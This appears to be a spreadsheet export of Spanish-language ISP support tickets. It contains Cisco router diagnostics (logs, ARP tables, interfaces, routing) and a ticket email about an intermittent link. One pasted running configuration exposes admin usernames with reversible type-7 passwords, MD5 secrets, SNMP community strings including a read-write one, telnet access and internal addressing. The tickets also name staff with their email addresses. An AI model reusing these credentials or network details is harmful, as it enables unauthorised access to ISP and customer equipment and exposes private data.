*MAY 27 15:36:56.295 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
*MAY 27 15:36:57.139 UTC: %LINK-5-CHANGED: INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*MAY 27 15:36:57.139 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 27 15:36:58.155 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO DOWN
*MAY 27 15:36:58.155 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 27 15:36:59.771 UTC: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.2(4)M6A, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2014 BY CISCO SYSTEMS, INC.
COMPILED TUE 15-APR-14 03:31 BY PROD_REL_TEAM
*MAY 27 15:36:59.815 UTC: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_FABRICA_RENE_GT_INTERNET_EL_TEJAR IS UNDERGOING A COLD START
*MAY 27 15:37:02.447 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 27 15:37:03.447 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 27 15:37:18.667 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 27 15:37:19.667 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 27 15:40:49.667 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 27 15:40:50.667 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 27 15:42:34.667 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 27 15:42:35.667 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 27 15:45:58.667 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 27 15:45:59.667 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 30 10:45:46.647 UTC: %PLATFORM-5-ECC_MSG: A CORRECTED SINGLE BIT ERROR HAS OCCURRED IN L2C DATA CACHE AT LOCATION 0X291.
*JUN  2 12:04:30.505 UTC: %CDP-4-DUPLEX_MISMATCH: DUPLEX MISMATCH DISCOVERED ON GIGABITETHERNET0/0 (NOT HALF DUPLEX), WITH CC_INVERSIONES_FINANCIERAS_GT_INTERNET_D GIGABITETHERNET0/0/0 (HALF DUPLEX).
CC_FABRICA_RENE_GT_INTERNET_EL_TEJAR#
SHOW CLOCK
*05:37:48.362 UTC SAT JUN 4 2022
CC_FABRICA_RENE_GT_INTERNET_EL_TEJAR#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.78.147.249           1   B443.2600.EDD5  ARPA   GIGABITETHERNET0/0
INTERNET  10.78.147.252           -   FC5B.39EC.9AA0  ARPA   GIGABITETHERNET0/0
INTERNET  190.56.47.245           -   FC5B.39EC.9AA1  ARPA   GIGABITETHERNET0/1
INTERNET  190.56.47.246          15   CC98.912A.21C0  ARPA   GIGABITETHERNET0/1
CC_FABRICA_RENE_GT_INTERNET_EL_TEJAR#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/39200035T/_/
GI0/1                          UP             UP       LAN DEL CLIENTE
LO5                            UP             UP       MONITOREO DEL CNOC
CC_FABRICA_RENE_GT_INTERNET_EL_TEJAR#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.78.147.252   YES NVRAM  UP                    UP
GIGABITETHERNET0/1         190.56.47.245   YES NVRAM  UP                    UP
LOOPBACK5                  10.212.162.66   YES NVRAM  UP                    UP
CC_FABRICA_RENE_GT_INTERNET_EL_TEJAR#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN INTERNET_GT_DEPTAL 10.78.147.252
  PING 10.78.147.252: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.78.147.252 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
RUTA IP:
PE: 10.179.28.32
DISPLAY IP ROUTING-TABLE VPN-INSTANCE INTERNET_GT_DEPTAL 10.78.147.252
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_GT_DEPTAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.78.147.252/32  DIRECT  0    0                 0.0.0.0         VLANIF3750			</t>
  </si>
  <si>
    <t>DE: RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;
ENVIADO: SÁBADO, 4 DE JUNIO DE 2022 0:30
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CASTAÑEDA CUEVAS CARLOS EMILIO &lt;CCCUEVAS@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE :: || CNOC TICKET IMPUS010582 || ID LOCAL 39200035 || ENLACE INTERMITENTE
SE VALIDA EL ENLACE OPERATIVO Y NO SE OBSERVAN ALARMAS DONDE SE DETERMINE CAÍDA A NIVEL DE WAN O REINICIO POR ENERGÍA EN EL CPE OPERATIVO ESPERO PUEDAN VALIDAR QUE SE ENCUENTRA OK SU SERVICIO.
SHOW LO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0 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (8192 BYTES):
*JAN  2 00:00:02.903: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = IPBASEK9 AND LICENSE = IPBASEK9
*MAY 27 15:36:37.131: C3600_SCP_SET_DSTADDR2_IDB(184)ADD = 80 NAME IS EMBEDDED-SERVICE-ENGINE0/0
*MAY 27 15:36:47.667: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 27 15:36:47.667: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 27 15:36:48.667: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 27 15:36:48.667: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 27 15:36:52.823: %USBFLASH-5-CHANGE: USBFLASH0 HAS BEEN INSERTED!
*MAY 27 15:36:55.279 UTC: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
*MAY 27 15:36:56.295 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
*MAY 27 15:36:57.139 UTC: %LINK-5-CHANGED: INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*MAY 27 15:36:57.139 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 27 15:36:58.155 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO DOWN
*MAY 27 15:36:58.155 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 27 15:36:59.771 UTC: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.2(4)M6A, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2014 BY CISCO SYSTEMS, INC.
COMPILED TUE 15-APR-14 03:31 BY PROD_REL_TEAM
*MAY 27 15:36:59.815 UTC: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_FABRICA_RENE_GT_INTERNET_EL_TEJAR IS UNDERGOING A COLD START
*MAY 27 15:37:02.447 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 27 15:37:03.447 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 27 15:37:18.667 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 27 15:37:19.667 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 27 15:40:49.667 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 27 15:40:50.667 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 27 15:42:34.667 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 27 15:42:35.667 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 27 15:45:58.667 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 27 15:45:59.667 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 30 10:45:46.647 UTC: %PLATFORM-5-ECC_MSG: A CORRECTED SINGLE BIT ERROR HAS OCCURRED IN L2C DATA CACHE AT LOCATION 0X291.
*JUN  2 12:04:30.505 UTC: %CDP-4-DUPLEX_MISMATCH: DUPLEX MISMATCH DISCOVERED ON GIGABITETHERNET0/0 (NOT HALF DUPLEX), WITH CC_INVERSIONES_FINANCIERAS_GT_INTERNET_D GIGABITETHERNET0/0/0 (HALF DUPLEX).
CC_FABRICA_RENE_GT_INTERNET_EL_TEJAR#
SHOW CLOCK
*05:37:48.362 UTC SAT JUN 4 2022
CC_FABRICA_RENE_GT_INTERNET_EL_TEJAR#</t>
  </si>
  <si>
    <t>F4589724</t>
  </si>
  <si>
    <t>SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO SE PROCEDE CON CIERRE DE TICKET PROACTIVO .
ROUTER CPE ACTIVO HACE 2 DÍAS.
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.4(3)M2, RELEASE SOFTWARE (FC2)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2015 BY CISCO SYSTEMS, INC.
COMPILED FRI 06-FEB-15 17:01 BY PROD_REL_TEAM
ROM: SYSTEM BOOTSTRAP, VERSION 15.0(1R)M16, RELEASE SOFTWARE (FC1)
CC_PRONE_GT_SUPER_24_ACASAGUASTLAN UPTIME IS 2 DAYS, 9 HOURS, 36 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM IMAGE FILE IS "USBFLASH0:C1900-UNIVERSALK9-MZ.SPA.154-3.M2.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1926E0T0
2 GIGABIT ETHERNET INTERFACES
1 TERMINAL LINE
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
250864K BYTES OF USB FLASH USBFLASH0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#	  PID			SN
-------------------------------------------------
*1  	  CISCO1921/K9          FJC1926E0T0
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
------------------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE                  TECHNOLOGY-PACKAGE
              CURRENT              TYPE           NEXT REBOOT
------------------------------------------------------------------------
IPBASE        IPBASEK9             PERMANENT      IPBASEK9
SECURITY      NONE                 NONE           NONE
DATA          NONE                 NONE           NONE
NTWKESS       NONE                 NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_PRONE_GT_SUPER_24_ACASAGUASTLAN#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 4745 BYTES
!
VERSION 15.4
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_PRONE_GT_SUPER_24_ACASAGUASTLAN
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$I.I6$7QGREKQ595TJAJJ5BYFRC.
!
NO AAA NEW-MODEL
!
!
!
!
!
!
!
!
!
!
!
!
!
!
IP DOMAIN NAME DIVINF.COM
IP NAME-SERVER 10.1.1.1
IP CEF
NO IPV6 CEF
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CTS LOGGING VERBOSE
!
!
LICENSE UDI PID CISCO1921/K9 SN FJC1926E0T0
!
!
USERNAME TELGUA PRIVILEGE 15 PASSWORD 7 1311121E0C1905
USERNAME MMORALES PRIVILEGE 15 PASSWORD 7 071C244F5C0C0D4514130809162F38
USERNAME CMONTERROSO PRIVILEGE 15 PASSWORD 7 15010E0F162F3F642B3E3A2C070204110E4556
USERNAME CSANTISTEBAN PRIVILEGE 15 PASSWORD 7 111A1C0605171F4C07392A2A3C3A266352
USERNAME GDUARTE PRIVILEGE 15 PASSWORD 7 094B4A1C181703174A4D
USERNAME GESTIONIP SECRET 5 $1$OKYT$BEMWSKXIVTN6KMJTGRWG90
USERNAME LCHEN PRIVILEGE 15 SECRET 5 $1$Y3NK$EBIAFVS4FPTJYRTFTU.8K.
USERNAME ELIQUEZ PRIVILEGE 15 SECRET 5 $1$STUH$ASDGD51PS8EIQJOZMD/XX0
USERNAME WLUNA PRIVILEGE 15 SECRET 5 $1$Y60C$A9RTVMGV0X1.UE0FAF3JO/
USERNAME MLARIOS PRIVILEGE 15 SECRET 5 $1$ZWJG$L/VSDM3PRJI1T/VEM3RFS/
USERNAME CLARO PASSWORD 7 121A09160004
!
REDUNDANCY
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.139.42 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/97100145T/_/
 BANDWIDTH 2048
 IP ADDRESS 10.87.91.212 255.255.255.248
 LOAD-INTERVAL 30
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 10.70.8.54 255.255.255.248 SECONDARY
 IP ADDRESS 10.45.2.254 255.255.255.0
 IP ACCESS-GROUP 110 IN
 NO IP PROXY-ARP
 IP FLOW INGRESS
 IP FLOW EGRESS
 DUPLEX AUTO
 SPEED AUTO
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
IP FLOW-EXPORT SOURCE GIGABITETHERNET0/1
IP FLOW-EXPORT VERSION 5
IP FLOW-EXPORT DESTINATION 10.1.1.198 9996
IP FLOW-EXPORT DESTINATION 10.1.1.46 9999
!
IP ROUTE 0.0.0.0 0.0.0.0 10.87.91.209
!
LOGGING SOURCE-INTERFACE LOOPBACK5
!
!
SNMP-SERVER COMMUNITY MON000971D RO
SNMP-SERVER COMMUNITY MON000089D RO
SNMP-SERVER COMMUNITY YES RO RD
SNMP-SERVER COMMUNITY YES! RW
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER IFINDEX PERSIST
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION ALDEA DE LA VIRGEN CANTON GUISAJO SAN CRISTOBAL ACASAGUASTLAN EL PROGRESO
ACCESS-LIST 2 PERMIT 10.212.139.42
ACCESS-LIST 2 PERMIT 10.1.1.198
ACCESS-LIST 2 PERMIT 10.1.20.128 0.0.0.15
ACCESS-LIST 2 PERMIT 10.2.10.192 0.0.0.15
ACCESS-LIST 2 PERMIT 10.2.26.192 0.0.0.15
ACCESS-LIST 2 PERMIT 10.25.1.0 0.0.0.31
ACCESS-LIST 2 PERMIT 10.87.91.208 0.0.0.7
ACCESS-LIST 2 PERMIT 10.25.1.0 0.0.0.255
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
ACCESS-LIST 110 PERMIT IP 10.1.20.128 0.0.0.15 HOST 10.45.2.254
ACCESS-LIST 110 PERMIT IP 10.2.10.192 0.0.0.15 HOST 10.45.2.254
ACCESS-LIST 110 PERMIT IP 10.2.26.192 0.0.0.15 HOST 10.45.2.254
ACCESS-LIST 110 PERMIT IP 10.25.1.0 0.0.0.31 HOST 10.45.2.254
ACCESS-LIST 110 PERMIT IP HOST 10.2.0.50 HOST 10.45.2.254
ACCESS-LIST 110 PERMIT IP HOST 10.2.0.51 HOST 10.45.2.254
ACCESS-LIST 110 PERMIT IP HOST 10.1.1.198 HOST 10.45.2.254
ACCESS-LIST 110 PERMIT IP HOST 10.2.1.34 HOST 10.45.2.254
ACCESS-LIST 110 PERMIT IP HOST 10.1.0.234 HOST 10.45.2.254
ACCESS-LIST 110 DENY   ICMP ANY ANY TIMESTAMP-REPLY
ACCESS-LIST 110 DENY   IP ANY HOST 10.45.2.254
ACCESS-LIST 110 PERMIT IP ANY ANY
!
CONTROL-PLANE
!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7 140317070B112B
 LOGGING SYNCHRONOUS
 LOGIN
LINE AUX 0
LINE 2
 NO ACTIVATION-CHARACTER
 NO EXEC
 TRANSPORT PREFERRED NONE
 TRANSPORT OUTPUT PAD TELNET RLOGIN LAPB-TA MOP UDPTN V120 SSH
 STOPBITS 1
LINE VTY 0 4
 ACCESS-CLASS 2 IN
 PASSWORD 7 1311121E0C1905
 LOGIN LOCAL
 TRANSPORT INPUT TELNET
LINE VTY 5 15
 ACCESS-CLASS 2 IN
 LOGIN
 TRANSPORT INPUT TELNET
!
SCHEDULER ALLOCATE 20000 1000
!
END
CC_PRONE_GT_SUPER_24_ACASAGUASTLAN#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 40 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 40 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 43 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (8192 BYTES):
*JAN  2 00:00:02.427: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = IPBASEK9 AND LICENSE = IPBASEK9
*JUN  1 22:09:21.127: C3600_SCP_SET_DSTADDR2_IDB(184)ADD = 80 NAME IS EMBEDDED-SERVICE-ENGINE0/0
*JUN  1 22:09:26.051: %CTS-6-ENV_DATA_START_STATE: ENVIRONMENT DATA DOWNLOAD IN START STATE
*JUN  1 22:09:31.999: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN  1 22:09:32.003: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN  1 22:09:32.999: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN  1 22:09:33.003: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN  1 22:09:37.123: %USBFLASH-5-CHANGE: USBFLASH0 HAS BEEN INSERTED!
*JUN  1 22:09:39.611 UTC: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
*JUN  1 22:09:40.619 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
*JUN  1 22:09:40.939 UTC: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.4(3)M2, RELEASE SOFTWARE (FC2)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2015 BY CISCO SYSTEMS, INC.
COMPILED FRI 06-FEB-15 17:01 BY PROD_REL_TEAM
*JUN  1 22:09:40.939 UTC: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_PRONE_GT_SUPER_24_ACASAGUASTLAN IS UNDERGOING A COLD START
*JUN  1 22:09:41.619 UTC: %LINK-5-CHANGED: INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUN  1 22:09:42.619 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO DOWN
*JUN  1 22:10:19.007 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN  1 22:10:20.007 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN  3 06:16:09.992 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*JUN  3 06:16:10.992 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*JUN  3 06:16:37.000 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN  3 06:16:38.000 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN  3 06:16:43.992 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*JUN  3 06:16:44.992 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*JUN  3 06:16:48.992 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN  3 06:16:49.992 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN  3 06:17:56.992 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*JUN  3 06:17:57.992 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*JUN  3 06:18:03.000 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN  3 06:18:04.000 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN  4 07:29:10.985 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*JUN  4 07:29:11.985 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*JUN  4 07:31:55.993 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN  4 07:31:56.993 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN  4 07:32:03.985 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*JUN  4 07:32:04.985 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*JUN  4 07:32:08.985 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN  4 07:32:09.985 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN  4 07:33:16.985 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*JUN  4 07:33:17.985 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*JUN  4 07:33:21.993 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN  4 07:33:22.993 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
CC_PRONE_GT_SUPER_24_ACASAGUASTLAN#
SHOW CLOCK
*07:45:14.405 UTC SAT JUN 4 2022
CC_PRONE_GT_SUPER_24_ACASAGUASTLAN#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.45.2.1              11   F439.091C.2A2D  ARPA   GIGABITETHERNET0/1
INTERNET  10.45.2.11              1   1860.24E0.62A1  ARPA   GIGABITETHERNET0/1
INTERNET  10.45.2.150             0   F45B.7391.A39B  ARPA   GIGABITETHERNET0/1
INTERNET  10.45.2.253           218   009A.D2EA.0CC0  ARPA   GIGABITETHERNET0/1
INTERNET  10.45.2.254             -   78BA.F9D1.2901  ARPA   GIGABITETHERNET0/1
INTERNET  10.70.8.54              -   78BA.F9D1.2901  ARPA   GIGABITETHERNET0/1
INTERNET  10.87.91.209            2   8CFD.18A2.85BE  ARPA   GIGABITETHERNET0/0
INTERNET  10.87.91.212            -   78BA.F9D1.2900  ARPA   GIGABITETHERNET0/0
CC_PRONE_GT_SUPER_24_ACASAGUASTLAN#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/97100145T/_/
GI0/1                          UP             UP       LAN DEL CLIENTE
LO5                            UP             UP       MONITOREO DEL CNOC
CC_PRONE_GT_SUPER_24_ACASAGUASTLAN#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.87.91.212    YES NVRAM  UP                    UP
GIGABITETHERNET0/1         10.45.2.254     YES NVRAM  UP                    UP
LOOPBACK5                  10.212.139.42   YES NVRAM  UP                    UP
CC_PRONE_GT_SUPER_24_ACASAGUASTLAN#
PING HACIA ROUTER CPE:
